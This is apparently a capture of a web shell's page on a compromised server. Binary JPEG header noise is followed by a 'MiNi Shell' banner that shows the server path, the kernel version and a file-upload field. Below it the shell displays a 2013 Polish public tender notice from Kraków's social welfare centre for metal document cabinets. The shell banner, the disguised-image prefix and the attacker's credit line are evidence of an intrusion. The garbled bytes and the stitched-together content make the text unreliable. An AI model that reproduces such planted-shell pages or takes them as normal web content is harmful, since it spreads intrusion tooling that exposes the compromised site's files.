JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131017/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131017/423138-N-2013.html

<p class="kh_header"><b>Kraków: Dostawa mebli metalowych na potrzeby komórek organizacyjnych Miejskiego Ośrodka Pomocy Społecznej w Krakowie</b><br>
<b>Numer ogłoszenia: 423138 - 2013; data zamieszczenia: 17.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli metalowych na potrzeby komórek organizacyjnych Miejskiego Ośrodka Pomocy Społecznej w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa szaf metalowych z nadstawkami  zwanych dalej towarem dla  komórek organizacyjnych Miejskiego Ośrodka Pomocy Społecznej w Krakowie, zgodnie z formularzem cenowym stanowiącym załącznik do formularza ofertowego, stanowiącego załącznik nr 1 do Specyfikacji istotnych warunków zamówienia. 
Przedmiot zamówienia został podzielony na trzy części. Warunki dodatkowe realizacji zamówienia:
1.Przedmiot zamówienia zostanie dostarczony w miejsca wymienione w ust. 2, w ilościach wskazanych w załączniku nr 2 i 3 do Specyfikacji istotnych warunków zamówienia. 
2.	Miejsce realizacji zamówienia:
1)	Działy Centralne MOPS ul. Józefińska 14 (zwany dalej DC),
2)	Filia nr 1 ul. Rzeźnicza 2 (zwana dalej F1),
3)	Filia nr 2 ul. Radzikowskiego 37 (zwana dalej F2),
4)	Filia nr 3 ul. Powstańców Wielkopolskich 3 (zwana dalej F3),
5)	Filia nr 4 os. Szkolne 34 (zwana dalej F4),
6)	Filia nr 5 ul. Praska 52 (zwana dalej F5),
7)	Filia nr 6 ul. Dietla 64 (zwana dalej F6),
8)	Filia nr 7 al. Słowackiego 46 (zwana dalej F7),
9)	Filia nr 8 ul. Jerzmanowskiego 37 (zwana dalej F8),
10)	Filia nr 9 os. Teatralne 24 (zwana dalej F9),
11)	Dział Rodzin Zastępczych os. Teatralne 24 (zwany dalej DZT),
12)	Dział Rodzin Zastępczych ul. Piłsudskiego 29 (zwany dalej DZP),
13)	Dział Pomocy Bezdomnym os. Teatralne 24 (zwany dalej DB),
3.	Termin realizacji zamówienia: do 40 dni od daty podpisania umowy.
4.	Wykonawca poinformuje Zamawiającego o terminie dostawy z minimum 7 dniowym wyprzedzeniem. Zamawiający zastrzega możliwość zmiany miejsca dostawy w granicach administracyjnych Miasta Krakowa
5.	Wynagrodzenie zostanie wypłacone po zrealizowaniu przedmiotu zamówienia,              w terminie do 7 dni od daty przyjęcia przez Zamawiającego faktury wystawionej zgodnie z przepisami rozporządzenia Ministra Finansów z dnia 28 marca 2011 roku w sprawie zwrotu podatku niektórym podatnikom, wystawiania faktur, sposobu ich przechowywania oraz listy towarów i usług, do których nie mają zastosowania zwolnienia od podatku od towarów i usług (Dz. U. z 2011 r., Nr 68 poz. 360)           wraz z protokołami odbioru za dostawy bezpośrednio na rachunek bankowy Wykonawcy wskazany w treści faktury.
6.	Wykonawca ma obowiązek wraz z fakturą dostarczyć protokół odbioru mebli dostarczonych do komórek organizacyjnych MOPS wskazanych w ust. 2 oraz zbiorczy dokument gwarancyjny, o którym mowa w ust. 7. Protokół ma być podpisany przez użytkownika w miejscu dostawy.


7.	Gwarancje udzielone przez Wykonawcę na oferowane meble mają wynosić minimum 24 miesiące. Gwarancja na dostarczone meble ma być zbiorcza i ma być wystawiona przez Wykonawcę. Dokument gwarancyjny ma zawierać datę sprzedaży oraz warunki gwarancji zgodnie z warunkami udzielenia zamówienia. Dokument ma być podpisany przez upoważnioną osobę.
8.	Osobami odpowiedzialnymi za odbiór przedmiotu zamówienia jest Robert Kowalski lub osoba upoważniona przez kierownika każdej komórki organizacyjnej Zamawiającego wymienionej w ust. 2.
9.	Czas naprawy gwarancyjnej nie może być dłuższy niż 3 dni od momentu zgłoszenia usterki. 
10.	W przypadku stwierdzenia przez Zamawiającego w ciągu 30 dni od dostawy wad w dostarczonym sprzęcie Wykonawca ma obowiązek wymienić wadliwy towar do 7 dni od daty otrzymania zgłoszenia.
11.	Zamawiający wymaga wniesienia przez Wykonawcę zabezpieczenia należytego wykonania umowy w wysokości 5% wartości umowy przed jej podpisaniem. Zabezpieczenie zostanie zwrócone Wykonawcy do 30 dni po prawidłowym wykonaniu przedmiotu umowy potwierdzonego protokołami odbioru.
12.	Dostawca zapłaci Zamawiającemu karę umowną:
1)	za opóźnienie w dostarczeniu przedmiotu zamówienia w terminie określonym      w ust. 3 wysokości 3% wartości partii towaru dostarczonego z opóźnieniem, za każdy dzień zwłoki,
2)	za opóźnienie usunięcia wad lub braków ilościowych przedmiotu zamówienia            w wysokości 3%  wartości części towaru podlegającej reklamacji za każdy dzień zwłoki,
3)	za odstąpienie od umowy z przyczyn leżących po stronie Wykonawcy 10% wynagrodzenia umownego.
13.	Kary umowne mogą być potrącane z wynagrodzenia należnego Wykonawcy.
14.	Wykonawca dostarczy przedmiot zamówienia własnym transportem, na własny koszt, w sposób zapewniający jego całość i nienaruszalność. W ramach zamówienia Wykonawca, za pomocą własnych pracowników, wniesie i zamontuje sprzęt                  w pomieszczeniach wskazanych przez Zamawiającego.
15.	Wykonawca oświadczy, że meble są fabrycznie nowe oraz  kompletne z punktu widzenia celu jakiemu mają służyć i zdatne do bezpośredniego użycia, zgodnie                z przeznaczeniem w momencie ich dostarczenia do Zamawiającego  w dniu dostawy przez Wykonawcę.
16.	Wykonawca ma obowiązek uwzględnić w ofercie koszty wszystkich materiałów oraz środków niezbędnych do wykonania przedmiotu umowy oraz koszty transportu i montażu mebli w miejscu wskazanym przez Zamawiającego (w tym montaż nadstawek na nowych oraz istniejących szafach metalowych - skręcenie ze sobą śrubami).
17.	Wykonawca zrealizuje przedmiot zamówienia przy pomocy własnych narzędzi, materiałów i środków technicznych oraz przy użyciu własnej siły roboczej. Dotyczy to również montażu mebli na miejscu.
18.	Wykonawca ma obowiązek każdorazowego konsultowania się z Zamawiającym wszelkich kwestii problematycznych w zakresie realizacji przedmiotu umowy.   
19.	Wszystkie meble  mają być wyposażone w zamki. Do każdego zamontowanego zamka Wykonawca jest zobowiązany min. 2 komplety kluczy.
20.	Wszystkie dostarczone meble podczas ustawienia w miejscu przeznaczenia mają zostać wypoziomowane.
21.	Zamawiający dopuszcza dostawy częściowe, zgodnie z wyodrębnionymi częściami wykazanymi w formularzu cenowym, stanowiącym załącznik do formularza ofertowego.
22.	Kolor szaf oraz nadstawek: kremowy.
23.	W szafach drzwi chowane do środka w nadstawkach tylko rozwieralne (nie chowane).
24.	Liczba półek: szafy 4 równomiernie rozmieszczone półki, nadstawki bez półek,
25.	Szafy i nadstawki zamykane zamkiem 3-punktowym z pokrętłem (typu Ronis).
26.	Konstrukcja szafy stalowa, blacha gr. min.0,8mm gięta,  zgrzewana lub/i spawana, malowana proszkowo.
27.	Wykonawca ma obowiązek połączyć ze sobą szafy i nadstawki. Wykonawca ma również obowiązek połączenia dostarczonej nadstawki do szafy, którą posiada Zamawiający. 
Szafa metalowa przeznaczona do przechowywania dokumentów, konstrukacja szafy zgrzewana, wieniec szafy wykonany z blachy stalowej 0,8-1 mm, drzwi dwuskrzydłowe chowane do środka podczas otwierania, uchwyt drzwiowy z zamkiem kluczowym zabezpieczającym, wyposażone  w 4 przestawne co ok. 35 mm półki plus podłoga, malowane proszkowo (kolor kremowy), wymiary ok.1950 - 2000 x1200x435 mm (wys x szer x gł)	18
Nadstawka do szafy biurowej metalowej ustawiana na górnym wieńcu szafy, wszystkie elementy wykonane z blachy stalowej 0,8-1 mm, drzwi skrzydłowe podwójne ze schowanymi zawiasami, uchwyt drzwiowy z zamkiem kluczowym,  malowane proszkowo (kolor kremowy) wymiary ok. 465x1200x435 mm (wys x szer x gł)	16
Szafa metalowa przeznaczona do przechowywania dokumentów, konstrukacja szafy zgrzewana, wieniec szafy wykonany z blachy stalowej 0,8-1 mm, drzwi dwuskrzydłowe chowane do środka podczas otwierania, uchwyt drzwiowy z zamkiem kluczowym zabezpieczającym, wyposażone  w 4 przestawne półki plus podłoga, malowane proszkowo (kolor kremowy), wymiary ok.1950-2000 x1000x435 mm (wys x szer x gł)	43
Nadstawka do szafy biurowej metalowej ustawiana na górnym wieńcu szafy, wszystkie elementy wykonane z blachy stalowej 0,8-1 mm, drzwi skrzydłowe podwójne ze schowanymi zawiasami, uchwyt drzwiowy z zamkiem kluczowym, malowane proszkowo (kolor kremowy) wymiary ok. 465x1000x435 mm (wys x szer x gł)	47
Szafa metalowa przeznaczona do przechowywania dokumentów, konstrukacja szafy zgrzewana, wieniec szafy wykonany z blachy stalowej 0,8-1 mm, drzwi dwuskrzydłowe chowane do środka podczas otwierania, uchwyt drzwiowy z zamkiem kluczowym zabezpieczającym, wyposażone  w 4 przestawne półki plus podłoga, malowane proszkowo (kolor kremowy), wymiary ok.1950-2000 x900x435 mm (wys x szer x gł)	32
Nadstawka do szafy biurowej metalowej ustawiana na górnym wieńcu szafy, wszystkie elementy wykonane z blachy stalowej 0,8-1 mm, drzwi skrzydłowe podwójne ze schowanymi zawiasami, uchwyt drzwiowy z zamkiem kluczowym, malowane proszkowo (kolor kremowy) wymiary ok. 465x900x435 mm (wys x szer x gł)	27.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.13.21.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę treści niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następującym zakresie: a)skrócenia czasu naprawy gwarancyjnej, b)wydłużenia okresu gwarancji, c)warunków płatności, d)miejsca dostawy towaru.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie, ul. Józefińska 14, pok. 003.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2013 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Społecznej w Krakowie, ul. Józefińska 14, dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com